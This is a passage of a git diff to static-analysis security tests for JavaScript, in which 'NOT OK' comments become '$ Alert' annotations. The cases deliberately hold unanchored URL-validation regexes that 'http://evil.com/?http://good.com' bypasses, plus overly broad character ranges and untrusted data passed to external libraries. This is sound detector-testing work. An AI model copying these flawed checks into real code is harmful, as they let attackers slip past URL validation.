zzz)|(xxx yyy)/i; // $ Alert + /^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i; // $ Alert + /^(xxx:)|(yyy:)|(zzz:)/; // $ Alert + /^(xxx?:)|(yyy:zzz\/)/; // $ Alert + /^@media|@page/; // $ Alert + /^\s*(xxx?|yyy|zzz):|xxx:yyy\//; // $ Alert + /^click|mouse|touch/; // $ Alert + /^http:\/\/good\.com|http:\/\/better\.com/; // $ Alert + /^https?:\/\/good\.com|https?:\/\/better\.com/; // $ Alert + /^mouse|touch|click|contextmenu|drop|dragover|dragend/; // $ Alert + /^xxx:|yyy:/i; // $ Alert + /_xxx|_yyy|_zzz$/; // $ Alert /em|%$/; // not flagged at the moment due to the anchor not being for letters /* diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js index c0c5ecb3e3e0..179273ee4502 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js @@ -1,29 +1,29 @@ (function(x){ - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor - /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // NOT OK - new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // NOT OK + /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // $ Alert + new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // $ Alert - if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // NOT OK + if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // $ Alert - new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // NOT OK + new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // $ Alert - if ("something".match("other")) {} // OK - if ("something".match("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // NOT OK + if ("something".match("other")) {} + if ("something".match("x.commissary")) {} + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // $ Alert let trustedUrls = [ - "https?://good.com", // NOT OK, referenced below - /https?:\/\/good.com/, // NOT OK, referenced below - new RegExp("https?://good.com"), // NOT OK, referenced below - "^https?://good.com" // NOT OK - missing post-anchor + "https?://good.com", // $ Alert - referenced below + /https?:\/\/good.com/, // $ Alert - referenced below + new RegExp("https?://good.com"), // $ Alert - referenced below + "^https?://good.com" // $ Alert - missing post-anchor ]; function isTrustedUrl(url) { for (let trustedUrl of trustedUrls) { @@ -32,10 +32,10 @@ return false; } - /https?:\/\/good.com\/([0-9]+)/.exec(url); // NOT OK - "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // OK + /https?:\/\/good.com\/([0-9]+)/.exec(url); // $ Alert + "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // g or .replace? file = file.replace( @@ -46,7 +46,7 @@ // missing context of use const urlPatterns = [ { - regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, // OK + regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, type: 'iframe', w: 560, h: 314, url: '//www.youtube.com/embed/$1', allowFullscreen: true @@ -74,7 +74,7 @@ var urlPatterns = [ {regex: /youtu\.be\/([\w\-.]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$1'}, {regex: /youtube\.com(.+)v=([^&]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$2'}, - {regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'}, + {regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'}, // $ Alert ]; // check optional successsor to TLD @@ -103,29 +103,29 @@ // replace path.replace(/engine.io/, "$&-client"); - /\.com|\.org/; // OK, has no domain name - /example\.com|whatever/; // OK, the other disjunction doesn't match a hostname + /\.com|\.org/; // OK - has no domain name + /example\.com|whatever/; // OK - the other disjunction doesn't match a hostname // MatchAll test cases: // Vulnerable patterns - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // NOT OK - missing protocol - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // NOT OK + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // $ Alert - missing protocol + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // $ Alert // Non-vulnerable patterns - if ("something".matchAll("other")) {} // OK - if ("something".matchAll("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} // OK + if ("something".matchAll("other")) {} + if ("something".matchAll("x.commissary")) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} + if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} }); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref index 77b5c92707f9..c42315c4550e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref @@ -1 +1,2 @@ -Security/CWE-020/OverlyLargeRange.ql +query: Security/CWE-020/OverlyLargeRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js index 913922271bb3..ef4bd7e9ca7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js @@ -1,34 +1,34 @@ -var overlap1 = /^[0-93-5]$/; // NOT OK +var overlap1 = /^[0-93-5]$/; // $ Alert -var overlap2 = /[A-ZA-z]/; // NOT OK +var overlap2 = /[A-ZA-z]/; // $ Alert -var isEmpty = /^[z-a]$/; // NOT OK +var isEmpty = /^[z-a]$/; // $ Alert -var isAscii = /^[\x00-\x7F]*$/; // OK +var isAscii = /^[\x00-\x7F]*$/; var printable = /[!-~]/; // OK - used to select most printable ASCII characters -var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; // OK +var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; -const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; // OK +const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; -var smallOverlap = /[0-9a-fA-f]/; // NOT OK +var smallOverlap = /[0-9a-fA-f]/; // $ Alert -var weirdRange = /[$-`]/; // NOT OK +var weirdRange = /[$-`]/; // $ Alert -var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // NOT OK +var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // $ Alert -var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // NOT OK +var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // $ Alert -var numberToLetter = /[7-F]/; // NOT OK +var numberToLetter = /[7-F]/; // $ Alert -var overlapsWithClass1 = /[0-9\d]/; // NOT OK +var overlapsWithClass1 = /[0-9\d]/; // $ Alert -var overlapsWithClass2 = /[\w,.-?:*+]/; // NOT OK +var overlapsWithClass2 = /[\w,.-?:*+]/; // $ Alert -var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; // OK -var tst3 = /[0-90-9]/; // OK +var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; +var tst3 = /[0-90-9]/; -var question = /[0-?]/; // OK. matches one of: 0123456789:;<=>? +var question = /[0-?]/; // OK - matches one of: 0123456789:;<=>? -var atToZ = /[@-Z]/; // OK. matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file +var atToZ = /[@-Z]/; // OK - matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected index 60423f3d6677..de528b8bde2e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected @@ -1,3 +1,16 @@ +#select +| tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | Call to external-lib() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | Call to external-lib.get.[callback].[param 'res'].send() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | Call to external-lib.get.[callback].[param 'req'].app.locals.something.foo() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | Call to lodash.merge() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | Call to lodash.merge() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | edges | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | provenance | | | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | provenance | | @@ -16,15 +29,15 @@ edges | tst-UntrustedDataToExternalAPI.js:10:19:10:27 | untrusted | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | provenance | | | tst-UntrustedDataToExternalAPI.js:14:12:16:9 | {\\n ... } [z] | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | provenance | | | tst-UntrustedDataToExternalAPI.js:15:16:15:24 | untrusted | tst-UntrustedDataToExternalAPI.js:14:12:16:9 | {\\n ... } [z] | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | provenance | | -| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | provenance | | -| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [y] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | provenance | | +| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [y] | provenance | | +| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | provenance | | nodes | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | semmle.label | window.name | @@ -42,24 +55,11 @@ nodes | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | semmle.label | {} | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | semmle.label | {\\n x ... usted\\n} | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | semmle.label | {\\n x ... usted\\n} [x] | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | semmle.label | {\\n x ... usted\\n} [y] | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | semmle.label | {\\n x ... usted\\n} [z] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | semmle.label | { // $ ... usted\\n} | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | semmle.label | { // $ ... usted\\n} [x] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [y] | semmle.label | { // $ ... usted\\n} [y] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | semmle.label | { // $ ... usted\\n} [z] | | tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | semmle.label | untrusted | subpaths -#select -| tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | Call to external-lib() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | Call to external-lib.get.[callback].[param 'res'].send() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | Call to external-lib.get.[callback].[param 'req'].app.locals.something.foo() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | Call to lodash.merge() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | Call to lodash.merge() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref index 7752378db17d..72cf5459b163 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref @@ -1 +1,2 @@ -Security/CWE-020/UntrustedDataToExternalAPI.ql +query: Security/CWE-020/UntrustedDataToExternalAPI.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js index 864b2b68a01c..ece90af5215c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js @@ -1,20 +1,20 @@ let externalLib = require('external-lib'); -let untrusted = window.name; +let untrusted = window.name; // $ Source -externalLib(untrusted); -externalLib({x: untrusted}); -externalLib(...untrusted); -externalLib(...window.CONFIG, untrusted); -externalLib({ ...untrusted }); -externalLib(['x', untrusted, 'y']); -externalLib('foo', untrusted); +externalLib(untrusted); // $ Alert +externalLib({x: untrusted}); // $ Alert +externalLib(...untrusted); // $ Alert +externalLib(...window.CONFIG, untrusted); // $ Alert +externalLib({ ...untrusted }); // $ Alert +externalLib(['x', untrusted, 'y']); // $ Alert +externalLib('foo', untrusted); // $ Alert externalLib({ x: { y: { z: untrusted } - } + } // $ Alert }); function getDeepUntrusted() { @@ -30,16 +30,16 @@ function getDeepUntrusted() { externalLib(getDeepUntrusted()); externalLib.get('/foo', (req, res) => { - res.send(untrusted); - req.app.locals.something.foo(untrusted); + res.send(untrusted); // $ Alert + req.app.locals.something.foo(untrusted); // $ Alert }); let jsonSafeParse = require('json-safe-parse'); jsonSafeParse(untrusted); // no need to report; has known taint step let merge = require('lodash.merge'); -merge({}, { +merge({}, { // $ Alert x: untrusted, // should not be treated as individual named parameters y: untrusted, z: untrusted -}); +}); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected index 6cd6e27b0edc..b3c764e85cbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected +++ 